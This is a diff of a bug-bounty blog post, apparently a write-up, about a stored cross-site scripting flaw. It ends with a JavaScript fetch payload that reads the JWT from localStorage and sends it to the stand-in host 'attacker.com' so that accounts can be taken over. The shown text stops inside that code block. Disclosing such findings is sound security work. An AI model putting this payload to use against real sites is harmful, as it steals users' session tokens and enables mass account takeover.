andreathniah/bucketoftears/_posts/2023-03-17-stored-xss-data-exfiltration.md

 I recently found a stored Cross-site Scripting (XSS) vulnerability while hunting at a target.

-While the bug class itself is not particularly spectacular, what interested me was on _what_ I do with it.
+While the bug class itself is not particularly spectacular, what interested me was on _what_ I could do with it.

 Showing an alert popup is fine and all, but impact of that level would likely only net me a `Medium` in severity at HackerOne.
-To justify for anything higher, I have to get creative on showing its possible disastrous impact.
+To justify for anything higher, I have to get creative on showing its potential disastrous impact.

 Given that this is a stored XSS, I thought to myself:

-> What if I were to demonstrate that an attacker can essentially farm for credentials of any authenticated users who browses the affected page?
-Account takeover would be trivial!
+> What if I demonstrate that an attacker can essentially harvest credentials from any authenticated user who browses the affected page?
+In that case, mass account takeovers would be trivial!

-An idea worthy trying out, especially since the application stores the value of its JWT in the browser's `localStorage` as `token`.
+An idea worth trying out, especially since the application stores the value of its JWT in the browser's `localStorage` as `token`.

-I can simply swap out the typical payload of `alert(document.domain)` to one that retrieves the token and make a GET request to a server under my control.
+I can simply swap out the typical payload of `alert(document.domain)` with one that retrieves the token and makes a GET request to a server under my control.

-Just like this; that should be it... right?
+Just like this; and that should be it... right?

 ```javascript
 fetch("https://attacker.com:8000/jwt=" + JSON.stringify(localStorage.getItem("token")));